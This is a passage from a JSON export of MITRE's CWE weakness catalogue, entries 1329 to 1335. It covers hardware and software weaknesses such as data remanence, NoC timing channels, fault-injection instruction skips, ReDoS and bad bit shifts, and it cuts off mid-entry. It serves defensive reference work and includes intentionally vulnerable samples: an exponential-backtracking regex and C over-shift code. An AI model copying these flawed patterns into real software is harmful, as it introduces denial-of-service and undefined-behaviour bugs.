Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-25"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1329":{"attr":{"@_ID":"1329","@_Name":"Reliance on Component That is Not Updateable","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product contains a component that cannot be updated or patched in order to remove vulnerabilities or significant bugs.","Extended_Description":{"xhtml:p":["If the component is discovered to contain a vulnerability or critical bug, but the issue cannot be fixed using an update or patch, then the product\'s operator will not be able to protect against the issue.  This could leave the product open to attacker exploitation or critical operation failures.","In industries such as healthcare, \\"legacy\\"\\n\\t\\t\\t    devices can be operated for decades.  As a\\n\\t\\t\\t    US task force report notes, \\"the inability\\n\\t\\t\\t    to update or replace equipment has both\\n\\t\\t\\t    large and small health care delivery\\n\\t\\t\\t    organizations struggle with numerous\\n\\t\\t\\t    unsupported legacy systems that cannot\\n\\t\\t\\t    easily be replaced (hardware, software and\\n\\t\\t\\t    operating systems) with large numbers of\\n\\t\\t\\t    vulnerabilities and few modern\\n\\t\\t\\t    countermeasures.\\" [REF-1197]","While hardware can be prone to this weakness, software systems can also be affected, such as when a third-party driver or library is no longer actively maintained or supported but is still critical for the required functionality."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"Designers might omit capabilities for updating a component due to time pressures to release the product or assumptions about the stability of the component."}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Reduce Maintainability"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Specify requirements that each component should be updateable."},{"Phase":"Architecture and Design","Description":"Design the product to allow for updating of its components. Consider the infrastructure that might be necessary to support updates."},{"Phase":"Implementation","Description":"Implement the necessary functionality to allow each component to be updated."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-145"},"Intro_Text":"A refrigerator has an Internet interface for the official purpose of alerting the manufacturer when that refrigerator detects a fault. Because the device is attached to the Internet, the refrigerator is a target for hackers who may wish to use the device other potentially more nefarious purposes.","Example_Code":[{"#text":"The refrigerator has no means of patching and is hacked becoming a spewer of email spam.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The device automatically patches itself and provides considerable more protection against being hacked.","attr":{"@_Nature":"good","@_Language":"Other"}}]},{"attr":{"@_Demonstrative_Example_ID":"DX-146"},"Intro_Text":{"xhtml:p":"A System-on-Chip (SOC) implements a Root-of-Trust (RoT) in ROM to boot secure code. However, at times this ROM code might have security vulnerabilities and need to be patched. Since ROM is immutable, it can be impossible to patch."},"Body_Text":"ROM does not have built-in application-programming interfaces (APIs) to patch if the code is vulnerable. Implement mechanisms to patch the vulnerable ROM code."}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1197","@_Section":"Executive Summary"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-12-03"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Description, References"}}},"1330":{"attr":{"@_ID":"1330","@_Name":"Remanent Data Readable after Memory Erase","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Confidential information stored in memory circuits is readable or recoverable after being cleared or erased.","Extended_Description":{"xhtml:p":["Data remanence occurs when stored, memory content is not fully lost after a memory-clear or -erase operation. Confidential memory contents can still be readable through data remanence in the hardware.","Data remanence can occur because of performance optimization or memory organization during \'clear\' or \'erase\' operations, like a design that allows the memory-organization metadata (e.g., file pointers) to be erased without erasing the actual memory content. To protect against this weakness, memory devices will often support different commands for optimized memory erase and explicit secure erase.","Data remanence can also happen because of the physical properties of memory circuits in use. For example, static, random-access-memory (SRAM) and dynamic, random-access-memory (DRAM) data retention is based on the charge retained in the memory cell, which depends on factors such as power supply, refresh rates, and temperature.","Other than explicit erase commands, self-encrypting, secure-memory devices can also support secure erase through cryptographic erase commands. In such designs, only the decryption keys for encrypted data stored on the device are erased. That is, the stored data are always remnant in the media after a cryptographic erase. However, only the encrypted data can be extracted. Thus, protection against data recovery in such designs relies on the strength of the encryption algorithm."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1301","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1301","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Security IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Modify Memory","Read Memory"],"Note":"Confidential data are readable to untrusted agent."}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":{"xhtml:ol":{"xhtml:li":["Testing of memory-device contents after clearing or erase commands.","Dynamic analysis of memory contents during device operation to detect specific, confidential assets.","Architecture and design analysis of memory clear and erase operations."]}}},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:ol":{"xhtml:li":["Testing of memory-device contents after clearing or erase commands.","Dynamic analysis of memory contents during device operation to detect specific, confidential assets.","Architecture and design analysis of memory clear and erase operations."]}}}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:ol":{"xhtml:li":["Support for secure-erase commands that apply multiple cycles of overwriting memory with known patterns and of erasing actual content.","Support for cryptographic erase in self-encrypting, memory devices.","External, physical tools to erase memory such as ultraviolet-rays-based erase of Electrically erasable, programmable, read-only memory (EEPROM).","Physical destruction of media device. This is done for repurposed or scrapped devices that are no longer in use."]}}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider a device that uses flash memory for non-volatile-data storage. To optimize flash-access performance or reliable-flash lifetime, the device might limit the number of flash writes/erases by maintaining some state in internal SRAM and only committing changes to flash memory periodically.","Body_Text":["The device also supports user reset to factory defaults with the expectation that all personal information is erased from the device after this operation. On factory reset, user files are erased using explicit, erase commands supported by the flash device.","In the given, system design, the flash-file system can support performance-optimized erase such that only the file metadata are erased and not the content. If this optimized erase is used for files containing user data during factory-reset flow, then device, flash memory can contain remanent data from these files.","On device-factory reset, the implementation might not erase these copies, since the file organization has changed and the flash file system does not have the metadata to track all previous copies.","A flash-memory region that is used by a flash-file system should be fully erased as part of the factory-reset flow. This should include secure-erase flow for the flash media such as overwriting patterns multiple times followed by erase."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-8575","Description":"Firmware Data Deletion Vulnerability in which a base station factory reset might not delete all user information. The impact of this enables a new owner of a used device that has been \\"factory-default reset\\" with a vulnerable firmware version can still retrieve, at least, the previous owner\'s wireless network name, and the previous owner\'s wireless security (such as WPA2) key. This issue was addressed with improved, data deletion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8575"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1154"}}},"Content_History":{"Submission":{"Submission_Name":"Hareesh Khattri, Arun Kanuparthi, Parbati K. Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-06-10"}}},"1331":{"attr":{"@_ID":"1331","@_Name":"Improper Isolation of Shared Resources in Network On Chip (NoC)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The Network On Chip (NoC) does not isolate or incorrectly isolates its on-chip-fabric and internal resources such that they are shared between trusted and untrusted agents, creating timing channels.","Extended_Description":{"xhtml:p":"Typically, network on chips (NoC) have many internal resources that are shared between packets from different trust domains. These resources include internal buffers, crossbars and switches, individual ports, and channels. The sharing of resources causes contention and introduces interference between differently trusted domains, which poses a security threat via a timing channel, allowing attackers to infer data that belongs to a trusted agent. This may also result in introducing network interference, resulting in degraded throughput and latency."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"653","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1189","@_View_ID":"1194"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Security IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":{"xhtml:p":"\\"Network-on-chip\\" (NoC) is a commonly-used term used for hardware interconnect fabrics used by multicore Systems-on-Chip (SoC).  Communication between modules on the chip uses packet-based methods, with improved efficiency and scalability compared to bus architectures [REF-1241]."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Availability"],"Impact":["DoS: Resource Consumption (Other)","Varies by Context","Other"],"Likelihood":"Medium","Note":"Attackers may infer data that belongs to a trusted agent; the methods used to perform this attack may result in noticeably increased resource consumption."}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Providing marker flags to send through the interfaces coupled with examination of which users are able to read or manipulate the flags will help verify that the proper isolation has been achieved and is effective.","Effectiveness":"Moderate"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Implement priority-based arbitration inside the NoC and have dedicated buffers or virtual channels for routing secret data from trusted agents."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider a NoC that implements a one-dimensional mesh network with four nodes. This supports two flows: Flow A from node 0 to node 3 (via node 1 and node 2) and Flow B from node 1 to node 2. Flows A and B share a common link between Node 1 and Node 2.  Only one flow can use the link in each cycle.","Body_Text":["One of the masters to this NoC implements a cryptographic algorithm (RSA), and another master to the NoC is a core that can be exercised by an attacker. The RSA algorithm performs a modulo multiplication of two large numbers and depends on each bit of the secret key. The algorithm examines each bit in the secret key and only performs multiplication if the bit is 1. This algorithm is known to be prone to timing attacks. Whenever RSA performs multiplication, there is additional network traffic to the memory controller. One of the reasons for this is cache conflicts.","Since this is a one-dimensional mesh, only one flow can use the link in each cycle.  Also, packets from the attack program and the RSA program share the output port of the network-on-chip.  This contention results in network interference, and the throughput and latency of one flow can be affected by the other flow\'s demand.","There may be different ways to fix this particular weakness."],"Example_Code":[{"#text":"The attacker runs a loop program on the core they control, and this causes a cache miss in every iteration for the RSA algorithm. Thus, by observing network-traffic bandwidth and timing, the attack program can determine when the RSA algorithm is doing a multiply operation (i.e., when the secret key bit is 1) and eventually extract the entire, secret key.","attr":{"@_Nature":"attack"}},{"#text":"Implement priority-based arbitration inside the NoC and have dedicated buffers or virtual channels for routing secret data from trusted agents.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"124"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1155"}},{"attr":{"@_External_Reference_ID":"REF-1241"}},{"attr":{"@_External_Reference_ID":"REF-1242"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-23"},"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"provided references and background information"}}},"1332":{"attr":{"@_ID":"1332","@_Name":"Improper Handling of Faults that Lead to Instruction Skips","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The device is missing or incorrectly implements circuitry or sensors that detect and mitigate the skipping of security-critical CPU instructions when they occur.","Extended_Description":{"xhtml:p":["The operating conditions of hardware may change\\n              in ways that cause unexpected behavior to occur,\\n              including the skipping of security-critical CPU\\n              instructions. Generally, this can occur due to\\n              electrical disturbances or when the device operates\\n              outside of its expected conditions.","In practice, application code may contain\\n\\t\\t\\t  conditional branches that are security-sensitive (e.g.,\\n\\t\\t\\t  accepting or rejecting a user-provided password). These\\n\\t\\t\\t  conditional branches are typically implemented by a\\n\\t\\t\\t  single conditional branch instruction in the program\\n\\t\\t\\t  binary which, if skipped, may lead to effectively\\n\\t\\t\\t  flipping the branch condition - i.e., causing the wrong\\n\\t\\t\\t  security-sensitive branch to be taken. This affects\\n\\t\\t\\t  processes such as firmware authentication, password\\n\\t\\t\\t  verification, and other security-sensitive decision\\n\\t\\t\\t  points.","Attackers can use fault injection techniques to\\n\\t\\t\\t  alter the operating conditions of hardware so that\\n\\t\\t\\t  security-critical instructions are skipped more\\n\\t\\t\\t  frequently or more reliably than they would in a\\n\\t\\t\\t  \\"natural\\" setting."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1247","@_View_ID":"1194","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Failure to design appropriate countermeasures to common fault injection techniques can manifest this weakness."},{"Phase":"Implementation","Note":"This weakness can arise if the hardware design incorrectly implements countermeasures to prevent fault injection."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Authentication"],"Impact":["Bypass Protection Mechanism","Alter Execution Logic","Unexpected State"],"Likelihood":"High","Note":"Depending on the context, instruction skipping can\\n                        have a broad range of consequences related to the\\n                        generic bypassing of security critical code."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"This weakness can be found using automated static analysis once a developer has indicated which code paths are critical to protect.","Effectiveness":"Moderate"},{"Method":"Simulation / Emulation","Description":"This weakness can be found using automated dynamic analysis. Both emulation of a CPU with instruction skips, as well as RTL simulation of a CPU IP, can indicate parts of the code that are sensitive to faults due to instruction skips.","Effectiveness":"Moderate"},{"Method":"Manual Analysis","Description":"This weakness can be found using manual (static) analysis. The analyst has security objectives that are matched against the high-level code. This method is less precise than emulation, especially if the analysis is done at the higher level language rather than at assembly level.","Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Design strategies for ensuring safe failure if inputs such as Vcc are modified out of acceptable ranges."},{"Phase":"Architecture and Design","Description":"Design strategies for ensuring safe behavior if instructions attempt to be skipped."},{"Phase":"Implementation","Description":"Ensure that architected fault mitigations are\\n                        strong enough in practice. For example, a low power\\n                        detection mechanism that takes 50 clock cycles to\\n                        trigger at lower voltages may be an insufficient security mechanism if the instruction counter\\n                        has already progressed with no other CPU activity occurring."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A smart card contains authentication credentials that are used as authorization to enter a building. The credentials are only accessible when a correct PIN is presented to the card.","Example_Code":[{"#text":"The card emits the credentials when a voltage anomaly is injected into the power line to the device at a particular time after providing an incorrect PIN to the card, causing the internal program to accept the incorrect PIN.","attr":{"@_Nature":"bad"}},{"attr":{"@_Nature":"good"},"xhtml:ul":{"xhtml:li":["add an internal filter or internal power supply in series with the power supply pin on the device","add sensing circuitry to reset the device if out of tolerance conditions are detected","add additional execution sensing circuits to monitor the execution order for anomalies and abort the action or reset the device under fault conditions"]}}],"Body_Text":"There are several ways this weakness could be fixed."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-15894","Description":"fault injection attack bypasses the verification mode, potentially allowing arbitrary code execution.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15894"}},"Functional_Areas":{"Functional_Area":"Power"},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1160"}},{"attr":{"@_External_Reference_ID":"REF-1161"}},{"attr":{"@_External_Reference_ID":"REF-1222"}},{"attr":{"@_External_Reference_ID":"REF-1223"}},{"attr":{"@_External_Reference_ID":"REF-1224"}}]},"Content_History":{"Submission":{"Submission_Name":"Jasper van Woudenberg","Submission_Organization":"Riscure","Submission_Date":"2020-10-14"},"Modification":[{"Modification_Name":"Jasper van Woudenberg","Modification_Organization":"Riscure","Modification_Date":"2021-01-11"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Functional_Areas, Potential_Mitigations, References"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Jasper van Woudenberg","Contribution_Organization":"Riscure","Contribution_Date":"2021-10-11","Contribution_Comment":"Provided detection methods and feedback on demonstrative example"}}},"1333":{"attr":{"@_ID":"1333","@_Name":"Inefficient Regular Expression Complexity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a regular expression with an inefficient, possibly exponential worst-case computational complexity that consumes excessive CPU cycles.","Extended_Description":{"#text":"Some regular expression engines have a feature called \\"backtracking\\". If the token cannot match, the engine \\"backtracks\\" to a position that may result in a different token that can match.Backtracking becomes a weakness if all of these conditions are met:","xhtml:br":["",""],"xhtml:ul":{"xhtml:li":["The number of possible backtracking attempts are exponential relative to the length of the input.","The input can fail to match the regular expression.","The input can be long enough."]},"xhtml:p":"Attackers can create crafted inputs that\\n\\t\\t  intentionally cause the regular expression to use\\n\\t\\t  excessive backtracking in a way that causes the CPU\\n\\t\\t  consumption to spike."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"407","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"185","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"ReDoS","Description":"ReDoS is an abbreviation of \\"Regular expression Denial of Service\\"."},{"Term":"Regular Expression Denial of Service","Description":"While this term is attack-focused, this is commonly used to describe the weakness."},{"Term":"Catastrophic backtracking","Description":"This term is used to describe the behavior of the regular expression as a negative technical impact."}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"A RegEx can be easy to create and read using unbounded matching characters, but the programmer might not consider the risk of  excessive backtracking."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use regular expressions that do not support backtracking, e.g. by removing nested quantifiers.","Effectiveness":"High","Effectiveness_Notes":"This is one of the few effective solutions when using user-provided regular expressions."},{"Phase":"System Configuration","Description":"Configure backtracking limits in the configuration of the regular expression implementation, such as PHP\'s pcre.backtrack_limit. Also consider limits on execution time for the process.","Effectiveness":"Moderate"},{"Phase":"Implementation","Description":"Do not use regular expressions with untrusted input. If regular expressions must be used, avoid using backtracking in the expression.","Effectiveness":"High"},{"Phase":"Implementation","Description":"Limit the length of the input that the regular expression will process.","Effectiveness":"Moderate"}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This example attempts to check if an input string is a \\"sentence\\" [REF-1164].","Example_Code":[{"#text":"var test_string = \\"Bad characters: $@#\\";var bad_pattern  = /^(\\\\w+\\\\s?)*$/i;var result = test_string.search(bad_pattern);","attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:br":["",""]},{"#text":"var test_string = \\"Bad characters: $@#\\";var good_pattern  = /^((?=(\\\\w+))\\\\2\\\\s?)*$/i;var result = test_string.search(good_pattern);","attr":{"@_Nature":"good","@_Language":"JavaScript"},"xhtml:br":["",""]}],"Body_Text":[{"xhtml:p":["The regular expression has a vulnerable backtracking clause inside (\\\\w+\\\\s?)*$ which can be triggered to cause a Denial of Service by processing particular phrases.","To fix the backtracking problem, backtracking is removed with the ?= portion of the expression which changes it to a lookahead and the \\\\2 which prevents the backtracking. The modified example is:"]},"Note that [REF-1164] has a more thorough (and lengthy) explanation of everything going on within the RegEx."]},{"Intro_Text":"This example attempts to check if an input string is a \\"sentence\\" and is modified for Perl [REF-1164].","Example_Code":[{"#text":"my $test_string = \\"Bad characters: \\\\$\\\\@\\\\#\\";my $bdrslt = $test_string;$bdrslt =~ /^(\\\\w+\\\\s?)*$/i;","attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:br":["",""]},{"#text":"my $test_string = \\"Bad characters: \\\\$\\\\@\\\\#\\";my $gdrslt = $test_string;$gdrslt =~ /^((?=(\\\\w+))\\\\2\\\\s?)*$/i;","attr":{"@_Nature":"good","@_Language":"Perl"},"xhtml:br":["",""]}],"Body_Text":[{"xhtml:p":["The regular expression has a vulnerable backtracking clause inside (\\\\w+\\\\s?)*$ which can be triggered to cause a Denial of Service by processing particular phrases.","To fix the backtracking problem, backtracking is removed with the ?= portion of the expression which changes it to a lookahead and the \\\\2 which prevents the backtracking. The modified example is:"]},"Note that [REF-1164] has a more thorough (and lengthy) explanation of everything going on within the RegEx."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-16215","Description":"Markdown parser uses inefficient regex when processing a message, allowing users to cause CPU consumption and delay preventing processing of other messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16215"},{"Reference":"CVE-2019-6785","Description":"Long string in a version control product allows DoS due to an inefficient regex.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6785"},{"Reference":"CVE-2019-12041","Description":"Javascript code allows ReDoS via a long string due to excessive backtracking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12041"},{"Reference":"CVE-2015-8315","Description":"ReDoS when parsing time.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8315"},{"Reference":"CVE-2015-8854","Description":"ReDoS when parsing documents.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8854"},{"Reference":"CVE-2017-16021","Description":"ReDoS when validating URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16021"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"492"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1180"}},{"attr":{"@_External_Reference_ID":"REF-1162"}},{"attr":{"@_External_Reference_ID":"REF-1163"}},{"attr":{"@_External_Reference_ID":"REF-1164"}},{"attr":{"@_External_Reference_ID":"REF-1165"}},{"attr":{"@_External_Reference_ID":"REF-1166"}},{"attr":{"@_External_Reference_ID":"REF-1167"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous External Contributor","Submission_Date":"2021-01-17"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated References"}}},"1334":{"attr":{"@_ID":"1334","@_Name":"Unauthorized Error Injection Can Degrade Hardware Redundancy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"An unauthorized agent can inject errors into a redundant block to deprive the system of redundancy or put the system in a degraded operating mode.","Extended_Description":{"xhtml:p":"To ensure the performance and functional reliability of certain components, hardware designers can implement hardware blocks for redundancy in the case that others fail. This redundant block can be prevented from performing as intended if the design allows unauthorized agents to inject errors into it. In this way, a path with injected errors may become unavailable to serve as a redundant channel. This may put the system into a degraded mode of operation which could be exploited by a subsequent attack."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."},{"Phase":"Integration","Note":"Such issues could be introduced during integration and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["DoS: Crash, Exit, or Restart","DoS: Instability","Quality Degradation","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)","Reduce Performance","Reduce Reliability","Unexpected State"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure the design does not allow error injection in modes intended for normal run-time operation. Provide access controls on interfaces for injecting errors."},{"Phase":"Implementation","Description":"Disallow error injection in modes which are expected to be used for normal run-time operation. Provide access controls on interfaces for injecting errors."},{"Phase":"Integration","Description":"Add an access control layer atop any unprotected interfaces for injecting errors."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"Content_History":{"Submission":{"Submission_Name":"James Pangburn","Submission_Organization":"Accellera IP Security Assurance (IPSA) Working Group","Submission_Date":"2020-07-29"}}},"1335":{"attr":{"@_ID":"1335","@_Name":"Incorrect Bitwise Shift of Integer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"An integer value is specified to be shifted by a negative amount or an amount greater than or equal to the number of bits contained in the value causing an unexpected or indeterminate result.","Extended_Description":{"xhtml:p":["Specifying a value to be shifted by a negative amount is undefined in various languages. Various computer architectures implement this action in different ways. The compilers and interpreters when generating code to accomplish a shift generally do not do a check for this issue.","Specifying an over-shift, a shift greater than or equal to the number of bits contained in a value to be shifted, produces a result which varies by architecture and compiler. In some languages, this action is specifically listed as producing an undefined result."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Adding shifts without properly verifying the size and sign of the shift amount."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"DoS: Crash, Exit, or Restart"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Implicitly or explicitly add checks and mitigation for negative or over-shift values."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A negative shift amount for an x86 or x86_64 shift instruction will produce the number of bits to be shifted by taking a 2\'s-complement of the shift amount and effectively masking that amount to the lowest 6 bits for a 64 bit shift instruction.","Example_Code":[{"#text":"unsigned int r = 1 &lt;&lt; -5;","attr":{"@_Nature":"bad","@_Language":"C"}},{"#text":"int choose_bit(int reg_bit, int bit_number_from_elsewhere){if (NEED_TO_SHIFT){reg_bit -= bit_number_from_elsewhere;}return reg_bit;}unsigned int handle_io_register(unsigned int *r){unsigned int the_bit = 1 &lt;&lt; choose_bit(5, 10);*r |= the_bit;return the_bit;}","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","","","","","","","","","","","",""]},{"#text":"int choose_bit(int reg_bit, int bit_number_from_elsewhere){if 